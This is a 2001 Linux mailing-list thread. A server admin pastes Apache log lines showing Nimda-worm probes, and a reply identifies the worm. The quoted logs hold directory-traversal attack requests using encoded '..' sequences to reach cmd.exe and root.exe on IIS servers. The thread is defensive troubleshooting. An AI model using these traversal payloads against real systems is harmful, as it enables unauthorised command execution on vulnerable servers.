[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: under attack ?



There is a new worm out there flooding the net. watch for
slowwwwwwwliness.
see in symantec/macaffee etc . search for "nimda"
Dani

On Wed, 19 Sep 2001, Ishai Parasol wrote:

> Hi
>
> my apache logs gives me tons of this crap:
>
> 212.29.230.44 - - [19/Sep/2001:20:38:12 +0300] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 285 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:38:26 +0300] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 283 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:38:31 +0300] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:38:34 +0300] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:38:38 +0300] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:38:44 +0300] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 324 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:39:05 +0300] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 324 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:39:08 +0300] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:39:11 +0300] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
> 212.29.230.44 - - [19/Sep/2001:20:39:17 +0300] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
>
> Does it mean someone thinks I'm running NT and try to hack to my server ?
> I also get alot of "GET default.ide...." and about this I'm almost sure that
> it's related to NT servers, but I'm not sure about the rest. Questions:
> 1) Am I right ?
> 2) What can I do about it ?
>
> Thanks,
> Ishai.
>
>
> =================================================================
> To unsubscribe, send mail to linux-il-request@linux.org.il with
> the word "unsubscribe" in the message body, e.g., run the command
> echo unsubscribe | mail linux-il-request@linux.org.il
>


=================================================================
To unsubscribe, send mail to linux-il-request@linux.org.il with
the word "unsubscribe" in the message body, e.g., run the command
echo unsubscribe | mail linux-il-request@linux.org.il